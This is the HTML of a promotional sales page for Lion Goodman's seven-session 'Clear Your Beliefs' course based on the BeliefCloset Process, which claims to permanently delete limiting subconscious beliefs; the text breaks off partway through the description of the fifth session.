Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their 